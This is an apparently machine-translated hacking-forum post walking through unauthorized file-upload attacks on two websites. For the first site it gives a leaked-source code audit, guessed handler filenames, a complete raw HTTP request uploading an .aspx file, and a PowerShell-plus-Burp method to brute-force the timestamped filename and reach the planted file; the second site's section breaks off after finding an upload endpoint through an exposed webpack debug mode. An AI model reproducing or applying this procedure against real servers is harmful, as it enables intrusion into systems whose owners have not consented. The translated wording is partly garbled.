Jump to content

Title: A lucky file upload

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

0x01 Site 1: File Upload

Source code leak found

Open your long-loving dictionary of spicy chicken, scan and find that there is bin.zip information leak, and try to perform code audit

File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

Find ProcessRequest to receive the request. You can see that after obtaining a bunch of parameters (initialized), you enter the HandleFiles method,1049983-20220112165429938-391093503.png

Follow up HandleFiles for processing. If dateType=ZBJHSB, the request will be processed. dateType is a GET parameter.

1049983-20220112165430473-721730897.png

The path is /Uploads/SetData/ZBJHSB, the str name is a timestamp, and str2 (suffix) is saved without restrictions.

1049983-20220112165431033-1357731238.png

OK, this should be a complete upload of any file. As long as there is a return value, the site will be gone. But unfortunately, he did not return the value.

Since the method fileUpload, guess the file name is

fileUpload.aspx

fileUpload.ashx

fileUpload.asmx

fileUploads.aspx

fileUploads.asmx

fileUploads.ashx

Upload. and other existing dictionary burst, and successfully found the file name http://xxx.com:6039/FileUploads.ashx

Directly construct the upload form. The name field in the Form here should not be set (not found in the code). After sending the package, it will return 200. Maybe it has been uploaded, right?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1

Host: xxx.cn:6039

Content-Length: 195

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---WebKitFormBoundarySVkAJfiOUeRxhsu8

Accept: */*

Connection: close

-----WebKitFormBoundarySVkAJfiOUeRxhsu8

Content-Disposition: form-data; name='File'; filename='1.aspx'

Content-Type: image/jpeg

1111111111111

-----WebKitFormBoundarySVkAJfiOUeRxhsu8-- 1049983-20220112165431515-1789961850.png

We saw before that the format used was yyyyMMddHHmmssfff as the file name, and then directly intercepted the suffix as ext. And we have a specific path, so we only need to burst the timestamp file name to get the site. We have not done this before, so we might as well give it a try.

Explosion Timestamp

Generate timestamps using Powershell, and then press go to send request packets in Burp

powershell -c Get-Date -Format yyyyMMddHHmmssfff

1049983-20220112165431864-1587439663.png

Blast the next 5 digits, that is, ssffff (since the time on the computer is not necessarily accurate, sometimes even 6 digits may be blasted)

I don't know how long I've been waiting

1049983-20220112165432292-192552.png

I'm so lucky, I won't say much about what's next.

0x02  Site 2: File Upload

Find the upload interface

Open the website http://xxxx:880/zwwpt/#/and find that there is a webpackdebug mode that is not closed. Check JS to find the upload interface

1049983-20220112165432739-1752971649.png

http://

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.